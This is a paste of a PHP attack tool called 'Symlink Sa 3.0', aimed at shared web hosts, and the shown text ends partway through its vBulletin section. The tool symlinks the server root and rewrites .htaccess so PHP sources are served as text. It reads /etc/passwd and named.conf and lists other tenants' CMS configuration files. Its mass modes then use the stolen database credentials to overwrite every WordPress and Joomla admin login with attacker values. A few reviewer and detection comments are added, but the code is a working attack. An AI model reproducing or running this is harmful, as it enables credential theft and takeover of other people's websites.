b3gund4L

Symlink Sa 3.0

Sep 2nd, 2018
  1. <?php // Script prologue: lifts the time limit, turns off error reporting, and derives the script's own base URLs.
  2. set_time_limit(0); // no execution time limit for this request
  3. error_reporting(0); // PHP error reporting off, so warnings/notices from the later calls are not reported
  4. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; // own URL; the scheme is hard-coded to http
  5. $u = explode("/",$pageURL ); // split on "/" to get the last segment (script name plus any query string)
  6. $pageURL =str_replace($u[count($u)-1],"",$pageURL ); // blanks every occurrence of that segment, leaving the directory URL
  7. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"]; // ftp:// variant with a hard-coded '/public_html/' path component
  8. $u = explode("/",$pageFTP ); // same last-segment split as above
  9. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP ); // directory form of the ftp:// URL
  10. ?>
  11.   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  12.     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  13.  
  14. <html xmlns="http://www.w3.org/1999/xhtml">
  15.  
  16. <head>
  17. <title>Symlink_Sa 3.0</title>
  18.  
  19. <style type="text/css">
  20.  
  21.   html,body {
  22.      margin: 0;
  23.      padding: 0;
  24.      outline: 0;
  25. }
  26. a{
  27.  
  28.  font-size: 13px;
  29.  
  30. }
  31.  
  32.  
  33. body {
  34.     direction: ltr;
  35.     background-color:#F4F4F4;
  36.     color: rgb(153, 153, 153);
  37.     text-align: center
  38. }
  39.  
  40.  
  41.  
  42. input,textarea,select{
  43. font-weight: bold;
  44. color: #000000;
  45. }
  46.  
  47. input,textarea,select:hover{
  48. box-shadow: 0px 0px 4px #AAAAAA;
  49. }
  50.  
  51.  
  52. .hedr {
  53.   font-family: Tahoma, Arial, sans-serif  ;
  54.   font-size: 22px;
  55.  
  56.  
  57. }
  58.  
  59. .cont a{
  60.  
  61.  text-decoration: none;
  62.  color:rgb(153, 153, 153);
  63.  font-family: Tahoma, Arial, sans-serif  ;
  64.  font-size: 16px;
  65.  text-shadow: 0px 0px 3px ;
  66. }
  67.  
  68. .cont a:hover{
  69.  
  70.  
  71.   color: #EEEEEE ;
  72.   text-shadow:0px 0px 3px #000000 ;
  73.  
  74.  
  75. }
  76.  
  77. .tmp tr td{
  78.  
  79. border: solid 1px #BBBBBB;
  80.  
  81. padding: 2px ;
  82.   font-size: 13px;
  83. }
  84.  
  85. .tmp tr td a {
  86.   text-decoration: none;
  87.  
  88.  
  89.  
  90. }
  91.  
  92. .foter{
  93.   font-size: 9pt;
  94.   color: #AAAAAA ;
  95.   text-align: center
  96. }
  97.  
  98. .tmp tr td:hover{
  99.  
  100. box-shadow: 0px 0px 4px #888888;
  101.  
  102. }
  103. .fot{
  104.  
  105. font-family:Tahoma, Arial, sans-serif;
  106.  
  107.   font-size: 11pt;
  108. }
  109. .for a : hover{
  110.  
  111. text-shadow: 0px 0px 1px #3366FF;
  112.  
  113. }
  114.  
  115.  
  116. .ir {
  117.   color: #FF0000;
  118. }
  119.  
  120.  
  121.  
  122. </style>
  123.  
  124. </head>
  125.  
  126. <body>
  127.  
  128. <div class='all'>
  129.  
  130.  
  131. <?php
  132.  
  133. @mkdir('sym',0777); // creates directory 'sym' beside the script with mode 0777; '@' suppresses any warning
  134. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; // .htaccess body: "Options all", a DirectoryIndex, AddType/AddHandler remaps for .php and .html, then "Require None" / "Satisfy Any"
  135. $f =@fopen ('sym/.htaccess','w'); // opens (truncating) sym/.htaccess; the result is not checked
  136. fwrite($f , $htcs); // writes the directives above; no fclose() follows here
  137. // NOTE(review): the "AddType text/plain" lines look intended to make PHP files reached through sym/ come back as plain text instead of being executed; confirm against the server's handler setup.
  138. // NOTE(review): these directives only take effect where per-directory overrides are honoured. Restricting AllowOverride and preferring SymLinksIfOwnerMatch over FollowSymLinks are common host-side mitigations (Apache documents the owner-match check as race-prone, so it should not be the only control).
  139. // Detection: a web-writable directory holding a freshly written .htaccess together with a symlink named 'root' that points at "/" is a strong indicator of this tool.
  140. @symlink("/","sym/root"); // links sym/root to the filesystem root, so sym/root/<path> resolves to /<path> wherever the web server follows the link
  141.  
  142. $pg = basename(__FILE__); // this script's own file name; interpolated into form action attributes later in the file
  143.  
  144. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ; // page banner with the tool name
  145. // Second banner line.
  146. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  147. // Navigation menu. Every mode is selected through the "sws" query parameter (sym, sec, file, passwd, read, joomla, wp, vb, help), so requests carrying sws= with these values are a usable access-log indicator.
  148. echo '<div class="cont">
  149.  
  150. [<a href="?"> Home </a>]
  151.  
  152. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  153.  
  154. [<a href="?sws=sec"> Domains & Script </a>]
  155.  
  156. [ <a href="?sws=file"> Symlink File </a>]
  157.  
  158. [<a href="?sws=passwd"> Symlink Bypass </a>]
  159.  
  160. <br /><br />
  161.  
  162. [ <a href="?sws=read"> Bypass Read </a>]
  163.  
  164. [ <a href="?sws=joomla"> Mass Joomla </a>]
  165.  
  166. [ <a href="?sws=wp"> Mass WordPress </a>]
  167.  
  168. [ <a href="?sws=vb"> Mass vBulletin </a>]
  169.  
  170. [ <a href="?sws=help"> Help </a>]
  171.  
  172. <br /><br /><br />
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179. </div>'; // end of the static menu; nothing in it depends on request input
  180.  
  181. if(isset($_REQUEST['sws']))
  182. {
  183.  
  184. switch ($_REQUEST['sws'])
  185. {
  186.  
  187.  
  188.  
  189.  
  190.  
  191. /// Domains + Scripts  ///
  192.  
  193. case 'sec':
  194.  
  195. if(!@is_file('named.txt')){
  196.  
  197. $d00m = @file("/etc/named.conf");
  198.  
  199. }else{
  200.  
  201. $d00m = @file("named.txt");
  202.  
  203.  
  204. }
  205. if(!$d00m)
  206. {
  207.  
  208.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  209. }
  210. else
  211.  
  212. {
  213. echo "<div class='tmp'>
  214. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  215. foreach($d00m as $dom){
  216.  
  217. flush();
  218. flush();
  219.  
  220.  
  221.  
  222. if(eregi("zone",$dom)){
  223.  
  224. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  225.  
  226. flush();
  227.  
  228. if(@strlen(trim($domsws[1][0])) > 2){
  229.  
  230. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  231.  
  232. ///////////////////////////////////////////////////////////////////////////////////
  233.  
  234. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  235. $wpp=@get_headers($wpl);
  236. $wp=$wpp[0];
  237.  
  238. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  239. $wpp2=@get_headers($wp2);
  240. $wp12=$wpp2[0];
  241.  
  242. ///////////////////////////////
  243.  
  244. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  245. $joo=@get_headers($jo1);
  246. $jo=$joo[0];
  247.  
  248.  
  249. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  250. $joo2=@get_headers($jo2);
  251. $jo12=$joo2[0];
  252.  
  253. ////////////////////////////////
  254.  
  255. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  256. $vbb=@get_headers($vb1);
  257. $vb=$vbb[0];
  258.  
  259. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  260. $vbb2=@get_headers($vb2);
  261. $vb12=$vbb2[0];
  262.  
  263. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  264. $vbb3=@get_headers($vb3);
  265. $vb13=$vbb3[0];
  266.  
  267. /////////////////
  268.  
  269. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  270. $whh2= @get_headers($wh1);
  271. $wh=$whh2[0];
  272.  
  273. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  274. $whh2= @get_headers($wh2);
  275. $wh12=$whh2[0];
  276.  
  277. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  278. $whh3= @get_headers($wh3);
  279. $wh13=$whh3[0];
  280.  
  281. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  282. $whh5= @get_headers($wh5);
  283. $wh15=$whh5[0];
  284.  
  285. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  286. $whh4= @get_headers($wh4);
  287. $wh14=$whh4[0];
  288.  
  289.  
  290.  
  291. ////////////////////////////////////////////////////////////////////////////////
  292.  
  293.  ////////// Wordpress ////////////
  294.  
  295. $pos = strpos($wp, "200");
  296. $config="&nbsp;";
  297.  
  298. if (strpos($wp, "200") == true )
  299. {
  300.  $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  301. }
  302. elseif (strpos($wp12, "200") == true)
  303. {
  304.   $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  305. }
  306.  
  307. ///////////WHMCS////////
  308.  
  309. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  310. {
  311.   $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  312.  
  313. }
  314. elseif (strpos($wh12, "200")  == true)
  315. {
  316.   $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  317. }
  318.  
  319. elseif (strpos($wh13, "200")  == true)
  320. {
  321.   $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  322.  
  323. }
  324.  
  325. ///////// Joomla to 4 ///////////
  326.  
  327. elseif (strpos($jo, "200")  == true)
  328. {
  329.   $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  330. }
  331.  
  332. elseif (strpos($jo12, "200")  == true)
  333. {
  334.   $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  335. }
  336.  
  337. //////////vBulletin to 4 ///////////
  338.  
  339. elseif (strpos($vb, "200")  == true)
  340. {
  341.   $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  342. }
  343.  
  344. elseif (strpos($vb12, "200")  == true)
  345. {
  346.   $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  347. }
  348.  
  349. elseif (strpos($vb13, "200")  == true)
  350. {
  351.   $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  352. }
  353.  
  354. else
  355. {
  356.  continue;
  357. }
  358. flush();
  359. flush();
  360.  
  361. /////////////////////////////////////////////////////////////////////////////////////
  362.  
  363.  
  364.  
  365. $site = $user['name'] ;
  366.  
  367.  
  368.  
  369. flush();
  370.  
  371. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  372. <td>".$config."</td></tr>"; flush();
  373.  
  374. }
  375. }
  376. }
  377. }
  378.  
  379.  
  380.  
  381.  
  382. break;
  383.  
  384.  
  385. /// user + domine + symlink  ///
  386.  
  387. case 'sym':
  388.  
  389. if(!is_file('named.txt')){
  390.  
  391. $d00m = @file("/etc/named.conf");
  392.  
  393. }else{
  394.  
  395. $d00m = @file("named.txt");
  396.  
  397.  
  398. }
  399. if(!$d00m)
  400. {
  401.  
  402.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  403. }
  404. else
  405.  
  406. {
  407. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  408. foreach($d00m as $dom){
  409.  
  410. if(eregi("zone",$dom)){
  411.  
  412. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  413.  
  414. flush();
  415.  
  416. if(strlen(trim($domsws[1][0])) > 2){
  417.  
  418. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  419.  
  420. flush();
  421.  
  422.  
  423.  
  424. $site = $user['name'] ;
  425.  
  426.  
  427. @symlink("/","sym/root");
  428.  
  429. $site = $domsws[1][0];
  430.  
  431. $ir = 'ir';
  432.  
  433. $il = 'il';
  434.  
  435. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  436. {
  437. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  438. }
  439.  
  440.  
  441. echo "
  442. <tr>
  443.  
  444. <td>
  445. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  446. </td>
  447.  
  448.  
  449. <td>
  450. ".$user['name']."
  451. </td>
  452.  
  453.  
  454.  
  455.  
  456.  
  457.  
  458. <td>
  459. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  460. </td>
  461.  
  462.  
  463. </tr></div> ";
  464.  
  465.  
  466. flush();
  467. flush();
  468.  
  469. }
  470. }
  471. }
  472. }
  473.  
  474.  
  475.  
  476.  
  477. break;
  478.  
  479.  
  480. /// file  symlink ///
  481.  
  482. case 'file':
  483.  
  484. echo'
  485. The file path to symlink
  486.  
  487. <br /><br />
  488. <form method="post">
  489. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  490. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  491. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  492.  
  493.  
  494.  
  495. </form>
  496. ';
  497.  
  498. $pfile = $_POST['file'];
  499. $symfile = $_POST['symfile'];
  500. $symlink = $_POST['symlink'];
  501.  
  502. if ($symlink)
  503. {
  504.  
  505.  
  506. @mkdir('sym1',0777);
  507. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  508. $f =@fopen ('sym1/.htaccess','w');
  509. @fwrite($f , $c);
  510.  
  511. @symlink("$pfile","sym1/$symfile");
  512.  
  513. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  514.  
  515. }
  516.  
  517.  
  518.  
  519. break;
  520.  
  521. /// bypass read
  522.  
  523. case 'read':
  524.  
  525. echo "read /etc/named.conf";
  526. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  527. flush();
  528. flush();
  529.  
  530.  
  531. $file = '/etc/named.conf';
  532.  
  533.  
  534. $r3ad = @fopen($file, 'r');
  535. if ($r3ad){
  536. $content = @fread($r3ad, @filesize($file));
  537. echo "".htmlentities($content)."";
  538. }
  539. else if (!$r3ad)
  540. {
  541. $r3ad = @show_source($file) ;
  542. }
  543. else if (!$r3ad)
  544. {
  545. $r3ad = @highlight_file($file);
  546. }
  547. else if (!$r3ad)
  548. {
  549. $sm = @symlink($file,'sym.txt');
  550.  
  551.  
  552. if ($sm){
  553. $r3ad = @fopen('sym/sym.txt', 'r');
  554. $content = @fread($r3ad, @filesize($file));
  555. echo "".htmlentities($content)."";
  556.  
  557. }
  558. }
  559.  
  560.  
  561.  
  562. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
  563.  
  564.  
  565. if(isset($_GET['save'])){
  566.  
  567.  
  568. $cont = stripcslashes($_POST['file']);
  569.  
  570. $f = fopen('named.txt','w');
  571.  
  572. $w = fwrite($f,$cont);
  573.  
  574.                   if($w){
  575.  
  576.                   echo '<br />save has been successfully';
  577.  
  578.                   }
  579.  
  580. fclose($f);
  581.  
  582.  
  583.  
  584.  
  585. }
  586.  
  587.  
  588.  
  589. break;
  590.  
  591. // passwd
  592.  
  593. case 'passwd':
  594.  
  595. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  596.  
  597.  
  598. $cont = stripcslashes($_POST['file']);
  599.  
  600. if(!file_exists('passwd.txt')){
  601.  
  602. $f = @fopen('passwd.txt','w');
  603.  
  604. $w = @fwrite($f,$cont);
  605.  
  606. fclose($f);
  607. }
  608. if($w or @filesize('passwd.txt') > 0){
  609. // * SHOW * //
  610.  
  611. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  612. flush();
  613.  
  614. $fil3 = file('passwd.txt');
  615.  
  616. foreach ($fil3 as $f){
  617.  
  618.      $u=explode(':', $f);
  619.      $user = $u['0'];
  620.  
  621.  
  622.  
  623. echo "
  624. <tr>
  625.  
  626.  
  627.  
  628. <td width='15%'>
  629. $user
  630. </td>
  631.  
  632.  
  633.  
  634.  
  635.  
  636.  
  637. <td width='10%'>
  638. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  639. </td>
  640.  
  641. <td width='10%'>
  642. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  643. </td>
  644.  
  645.  
  646.  
  647. </tr></div> ";
  648.  
  649.  
  650. flush();
  651. flush();
  652.  
  653.  
  654. }
  655.  
  656.  
  657.  
  658.  
  659.  
  660.  
  661. die ("</tr></div>");
  662.  
  663.  
  664.                   }
  665.  
  666.  
  667.  
  668.  
  669.  
  670. }
  671.  
  672.  
  673.  
  674. echo "read /etc/passwd";
  675. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  676. flush();
  677.  
  678. $file = '/etc/passwd';
  679.  
  680.  
  681. $r3ad = @fopen($file, 'r');
  682. if ($r3ad){
  683. $content = @fread($r3ad, @filesize($file));
  684. echo "".htmlentities($content)."";
  685. }
  686. elseif(!$r3ad)
  687. {
  688. $r3ad = @show_source($file) ;
  689. }
  690. elseif(!$r3ad)
  691. {
  692. $r3ad = @highlight_file($file);
  693. }
  694. elseif(!$r3ad)
  695. {
  696.  
  697.                                             for($uid=0;$uid<1000;$uid++){
  698.                                              $ara = posix_getpwuid($uid);
  699.                                                if (!empty($ara)) {
  700.                                                   while (list ($key, $val) = each($ara)){
  701.                                                     print "$val:";
  702.                                                   }
  703.                                                   print "\n";
  704.                                                  }
  705.  
  706.                                         }
  707.  
  708.  }
  709.  
  710.  
  711. flush();
  712.  
  713.  
  714. echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  715. flush();
  716.  
  717. break;
  718.  
  719.  
  720.  
  721. case 'joomla':
  722.  
  723. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  724.  
  725.  
  726. if(isset($_POST['s'])){
  727.  
  728. $file = @file_get_contents('joomla.txt');
  729.  
  730. $ex   = explode("\n",$file);
  731.  
  732. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  733. flush();
  734.  
  735.  
  736. foreach ($ex as $exp){
  737.  
  738. $es   = explode("||",$exp);
  739.  
  740. $config = $es[0];
  741.  
  742. $domin = $es[1];
  743.  
  744. $domins = trim($domin).'';
  745.  
  746. $readconfig  = @file_get_contents(trim($config));
  747.  
  748. if(ereg('JConfig',$readconfig)){
  749.  
  750.  
  751.  
  752. $pass    =  ex($readconfig,'$password = \'',"';");
  753.  
  754. $userdb  =  ex($readconfig,'$user = \'',"';");
  755.  
  756. $db      =  ex($readconfig,'$db = \'',"';");
  757.  
  758. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
  759.  
  760. $tab     =  $fix.'users';
  761.  
  762.  
  763. $con     = @mysql_connect('localhost',$userdb,$pass);
  764.  
  765. $db      = @mysql_select_db($db,$con);
  766.  
  767. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");
  768.  
  769.  
  770. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  771.  
  772.  
  773. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  774.  
  775. $domins = trim($domin).'';
  776.  
  777. echo "<tr>
  778. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  779. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  780. flush();
  781.  
  782.  
  783.  
  784. }else{
  785.  
  786. echo "<tr>
  787. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  788. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  789. flush();
  790.  
  791. }
  792.  
  793. }
  794.  
  795.  
  796.  
  797.  
  798.  
  799.  
  800.  
  801.  
  802.  
  803. die();
  804.  
  805. }
  806.  
  807. if(!is_file('named.txt')){
  808.  
  809. $d00m = @file("/etc/named.conf");
  810.  
  811. flush();
  812.  
  813.  
  814. }else{
  815.  
  816. $d00m = file("named.txt");
  817.  
  818.  
  819. }
  820. if(!$d00m)
  821. {
  822.  
  823.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  824. }
  825. else
  826.  
  827. {
  828. echo "<div class='tmp'>
  829. <form method='POST' action='$pg?sws=joomla'>
  830. <input type='submit' value='Mass ching Admin' />
  831. <input type='hidden' value='1' name='s' />
  832. </form><br /><br />
  833. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  834.  
  835. $f = fopen('joomla.txt','w');
  836.  
  837. foreach($d00m as $dom){
  838.  
  839. if(eregi("zone",$dom)){
  840.  
  841. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  842.  
  843. if(strlen(trim($domsws[1][0])) > 2){
  844.  
  845. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  846.  
  847. ///////////////////////////////////////////////////////////////////////////////////
  848.  
  849. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  850. $wpp=get_headers($wpl);
  851. $wp=$wpp[0];
  852.  
  853. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  854. $wpp2=get_headers($wp2);
  855. $wp12=$wpp2[0];
  856.  
  857. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  858. $wpp3=get_headers($wp3);
  859. $wp13=$wpp3[0];
  860.  
  861.  
  862.  ////////// joomla ////////////
  863.  
  864. $pos = strpos($wp, "200");
  865. $config="&nbsp;";
  866.  
  867. if (strpos($wp, "200") == true )
  868. {
  869.  $config= $wpl;
  870. }
  871. elseif (strpos($wp12, "200") == true)
  872. {
  873.   $config= $wp2;
  874. }
  875. elseif (strpos($wp13, "200") == true)
  876. {
  877.   $config= $wp3;
  878. }
  879. else
  880. {
  881. continue;
  882.  
  883. }
  884. flush();
  885.  
  886. /////////////////////////////////////////////////////////////////////////////////////
  887.  
  888. $dom = $domsws[1][0];
  889.  
  890. $w = fwrite($f,"$config||$dom \n");
  891. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  892.  
  893.  
  894. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  895. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  896.  
  897.  
  898.  
  899.  
  900.  
  901. flush();
  902.  
  903.  
  904. }
  905. }
  906. }
  907. }
  908.  
  909.  
  910. break;
  911.  
  912. case 'wp':
  913.  
  914. ############################ index #########################3
  915.  
  916.  
  917.  
  918.  
  919.  
  920.  
  921. ########  admin ##########33
  922.  
  923. if(isset($_POST['s'])){
  924.  
  925. $file = @file_get_contents('wp.txt');
  926.  
  927. $ex   = explode("\n",$file);
  928.  
  929. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  930. flush();
  931. flush();
  932.  
  933.  
  934. foreach ($ex as $exp){
  935.  
  936. $es   = explode("||",$exp);
  937.  
  938. $config = $es[0];
  939.  
  940. $domin = $es[1];
  941.  
  942. $domins = trim($domin).'';
  943.  
  944. $readconfig  = @file_get_contents(trim($config));
  945.  
  946. if(ereg('wp-settings.php',$readconfig)){
  947.  
  948.  
  949.  
  950. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
  951.  
  952. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
  953.  
  954. $db      =  ex($readconfig,"define('DB_NAME', '","');");
  955.  
  956. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
  957.  
  958. $tab     = $fix.'users';
  959.  
  960. $con     = @mysql_connect('localhost',$userdb,$pass);
  961.  
  962. $db      = @mysql_select_db($db,$con);
  963.  
  964. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  965.  
  966. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  967.  
  968.  
  969.  
  970. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  971.  
  972. else
  973.  
  974. {
  975.  
  976. $r = '<b style="color:red">failed</b>';
  977.  
  978. }
  979.  
  980. $domins = trim($domin).'';
  981.  
  982. echo "<tr>
  983. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  984. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  985.  
  986. flush();
  987. flush();
  988.  
  989.  
  990.  
  991.  
  992.  
  993.  
  994. }else{
  995.  
  996. echo "<tr>
  997. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  998. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  999.  
  1000. flush();
  1001. flush();
  1002.  
  1003. }
  1004.  
  1005. }
  1006.  
  1007.  
  1008.  
  1009.  
  1010.  
  1011.  
  1012.  
  1013.  
  1014.  
  1015.  
  1016. die();
  1017.  
  1018. }
  1019.  
  1020. if(!is_file('named.txt')){
  1021.  
  1022. $d00m = @file("/etc/named.conf");
  1023.  
  1024. }else{
  1025.  
  1026. $d00m = @file("named.txt");
  1027.  
  1028.  
  1029. }
  1030. if(!$d00m)
  1031. {
  1032.  
  1033.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1034. }
  1035. else
  1036.  
  1037. {
  1038. echo "<div class='tmp'>
  1039. <form method='POST' action='$pg?sws=wp'>
  1040. <input type='submit' value='Mass Change Admin' />
  1041. <input type='hidden' value='1' name='s' />
  1042. </form>
  1043. <br /><br />
  1044. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1045.  
  1046. flush();
  1047. flush();
  1048.  
  1049. $f = fopen('wp.txt','w');
  1050.  
  1051. foreach($d00m as $dom){
  1052.  
  1053. if(eregi("zone",$dom)){
  1054.  
  1055. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1056.  
  1057. if(strlen(trim($domsws[1][0])) > 2){
  1058.  
  1059. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1060.  
  1061. ///////////////////////////////////////////////////////////////////////////////////
  1062.  
  1063. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1064. $wpp=get_headers($wpl);
  1065. $wp=$wpp[0];
  1066.  
  1067. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1068. $wpp2=get_headers($wp2);
  1069. $wp12=$wpp2[0];
  1070.  
  1071. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1072. $wpp3=get_headers($wp3);
  1073. $wp13=$wpp3[0];
  1074.  
  1075.  
  1076.  ////////// wp ////////////
  1077.  
  1078. $pos = strpos($wp, "200");
  1079. $config="&nbsp;";
  1080.  
  1081. if (strpos($wp, "200") == true )
  1082. {
  1083.  $config= $wpl;
  1084. }
  1085. elseif (strpos($wp12, "200") == true)
  1086. {
  1087.   $config= $wp2;
  1088. }
  1089. elseif (strpos($wp13, "200") == true)
  1090. {
  1091.   $config= $wp3;
  1092. }
  1093. else
  1094. {
  1095. continue;
  1096.  
  1097. }
  1098. flush();
  1099.  
  1100. /////////////////////////////////////////////////////////////////////////////////////
  1101.  
  1102. $dom = $domsws[1][0];
  1103.  
  1104. $w = fwrite($f,"$config||$dom \n");
  1105. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1106.  
  1107.  
  1108. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1109. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1110. flush();
  1111. flush();
  1112.  
  1113.  
  1114.  
  1115.  
  1116.  
  1117. flush();
  1118.  
  1119.  
  1120. }
  1121. }
  1122. }
  1123. }
  1124.  
  1125.  
  1126. break;
  1127.  
  1128.  
  1129. case 'vb':
  1130.  
  1131.  
  1132. if(isset($_POST['s'])){
  1133.  
  1134.  
  1135.  
  1136. $file = @file_get_contents('vb.txt');
  1137.  
  1138. $ex   = explode("\n",$file);
  1139.  
  1140. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1141.  
  1142.  
  1143. foreach ($ex as $exp){
  1144.  
  1145. $es   = explode("||",$exp);
  1146.  
  1147. $config = $es[0];
  1148.  
  1149. $domin = $es[1];
  1150.  
  1151. $domins = trim($domin).'';
  1152.  
  1153. $readconfig  = @file_get_contents(trim($config));
  1154.  
  1155. if(ereg('vBulletin',$readconfig)){
  1156.  
  1157.  
  1158.  
  1159. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1160.  
  1161. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
